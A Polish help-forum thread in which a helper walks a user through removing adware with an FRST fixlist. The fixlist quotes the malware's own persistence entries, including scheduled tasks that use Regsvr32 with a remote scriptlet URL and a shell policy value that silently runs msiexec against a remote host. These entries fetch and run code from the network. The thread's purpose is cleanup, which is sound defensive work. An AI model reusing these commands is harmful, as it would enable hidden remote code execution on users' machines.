Złapałem jakiegoś wirusa który odpala mi reklamy i zmienia domyślną przeglądarkę na rambler. Próbowałem się tego pozbyć różnymi antywirami ale nie dały sobie rady. Proszę o pomoc !
Raporty z FRST
Odinstaluj Avira lub Avast.
Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:
HKU\S-1-5-21-2526773658-465818872-1255696198-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj81MkF1M8ZSOUF4MjFcFTzXFkU2NTq2MWw1NdZQFjw4FF== /q
IFEO\taskmgr.exe: [Debugger]
BootExecute: autocheck autochk * sdnclean64.exe
CHR StartupUrls: Default -> "hxxp://www.mystartsearch.com/?type=hp&ts=1422794017&from=amt&uid=CrucialXCT120M500SSD1_14130C0EDF280C0EDF28","hxxp://www.gazeta.pl/0,0.html?p=190"
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ofoeigeaodhbjogdigckajfhjbonaofg] - hxxps://clients2.google.com/service/update2/crx
2017-04-21 22:44 - 2017-04-22 15:04 - 00000000 ____D C:\AdwCleaner
2017-04-22 01:34 - 2017-04-22 01:34 - 00029139 _____ C:\ProgramData\agent.1492817673.bdinstall.bin
2017-04-22 01:04 - 2017-04-22 01:04 - 00000000 ____D C:\Users\Tomash\AppData\Local\Bitdefender Antivirus Free
2017-04-22 01:03 - 2017-04-22 01:03 - 00000000 ____D C:\ProgramData\Bitdefender
2017-04-22 01:00 - 2017-04-22 01:00 - 00000000 ____D C:\Users\Tomash\AppData\Roaming\QuickScan
2017-04-22 00:59 - 2017-04-22 00:59 - 00047380 _____ C:\ProgramData\agent.1492815567.bdinstall.bin
2017-04-22 00:59 - 2017-04-22 00:59 - 00000000 ____D C:\ProgramData\Bitdefender Agent
2017-04-21 22:28 - 2017-04-21 22:28 - 00000000 ____D C:\ProgramData\GridinSoft
2017-04-21 18:56 - 2017-04-21 18:56 - 00000000 ____D C:\WINDOWS\SysWOW64\extensions
2017-04-21 17:26 - 2017-04-21 17:26 - 00000000 ____D C:\Users\Tomash\AppData\Local\Boxbob
2017-04-21 17:26 - 2017-04-21 17:26 - 00000000 _____ C:\WINDOWS\SysWOW64\33
2017-04-21 17:26 - 2017-04-21 17:26 - 00000000 _____ C:\WINDOWS\SysWOW64\11
2017-04-20 20:07 - 2017-04-20 20:13 - 00000000 ____D C:\Users\Tomash\Doctor Web
2017-04-22 01:01 - 2016-10-02 14:57 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-04-22 00:59 - 2017-04-22 00:59 - 0047380 _____ () C:\ProgramData\agent.1492815567.bdinstall.bin
2017-04-22 01:34 - 2017-04-22 01:34 - 0029139 _____ () C:\ProgramData\agent.1492817673.bdinstall.bin
Task: {257491A0-E2E7-4A0A-8398-6C9D24276368} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2016-08-15] ()
Task: {2A9AAD30-9E01-4FA4-BC32-8DA83A62AF6E} - System32\Tasks\{738B377B-4BB0-42CB-9AB2-2E3B76C7E91A} => pcalua.exe -a "C:\Program Files (x86)\NapiProjekt\unins000.exe"
Task: {50438256-8FE7-4D83-9D40-6ACD40699A7B} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj81MkF1M8ZSOUF4MjFcFTzXFkU2NTq2MWw1NdZQFjw4FF== scrobj.dll
Task: {8F54CADF-FF1E-494C-9ED4-E30132DB4496} - System32\Tasks\GridinSoft Anti-Malware => C:\Program Files\GridinSoft Anti-Malware\gsam.exe
Task: {983FF386-925E-4317-AC97-85BC343D4F9A} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj81MkF1M8ZSOUF4MjFcFTzXFkU2NTq2MWw1NdZQFjw4FF== scrobj.dll
HKLM\...\StartupApproved\Run32: => "SDTray"
HKU\S-1-5-21-2526773658-465818872-1255696198-1001\...\StartupApproved\Run: => "SpybotPostWindows10UpgradeReInstall"
RemoveProxy:
EmptyTemp:
Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.
Kliknij Skanuj (Scan) i pokaż nowy raport z FRST bez Addition i Shortcut.
Nadal działa proces od Aviry.
Skasuj folder C:\FRST
ok skasowałem Avire kompletnie
wygląda na to że już jest ok
czy może jeszcze coś powinienem zrobić?
Włącz przywracanie systemu dla dysku systemowego C:
https://www.tenforums.com/tutorials/4533-turn-off-system-protection-drives-windows-10-a.html
Włączyłem.
Wielkie dzięki za pomoc